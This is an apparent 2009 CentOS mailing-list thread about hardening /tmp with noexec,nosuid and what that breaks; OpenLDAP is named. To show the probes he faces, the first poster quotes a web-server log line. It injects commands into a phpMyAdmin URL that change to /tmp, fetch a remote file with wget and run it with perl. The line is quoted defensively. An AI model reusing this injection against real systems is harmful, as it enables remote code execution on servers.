Does mounting /tmp as noexec,nosuid break anything in CentOS 5? I've been in solaris land forever and a day and this is a pretty standard security measure. I noticed CentOS comes default mounting /tmp with both those options allowed.. I'm getting constant php hack attacks against (mostly script kiddie level stuff right now) my server and will rest much easier with this setting in place.. We've been evaluating numerous wiki products which are certain to have security holes as well as pypmyadmin... Seeing a lot of crap like this:
193.253.240.85 - - [23/Aug/2009:16:57:57 -0500] "GET /phpmyadmin/config/config.inc.php?c=cd%20/tmp;rm%20-rf%20font-nix;wget%2078.46.33.52/font-nix;perl%20font-nix HTTP/1.1" 404 230
(of course I use cryptic names for my phpmyadmin install directory as well as password protect the directory and make any sensitive config files readable only by the web server owner)
Thx for any info rhugga
On Mon, Aug 24, 2009 at 2:04 PM, Chuckchuck.carson@gmail.com wrote:
I've been doing this for a lot of time without issues. noexec,nosuid,nodev ftw! :)
Hi,
On Mon, Aug 24, 2009 at 09:04, Chuckchuck.carson@gmail.com wrote:
Does mounting /tmp as noexec,nosuid break anything in CentOS 5?
It breaks the OpenLDAP server, but it can be worked around by setting the $TMP environment variable to another directory in /etc/sysconfig/ldap. I believe there are other packages that might be affected, but in most cases I think they might be fixable by setting environment variables or patching scripts. YMMV.
HTH, Filipe
-
Chuck -
Filipe Brandenburger -
Lucian @ lastdot.org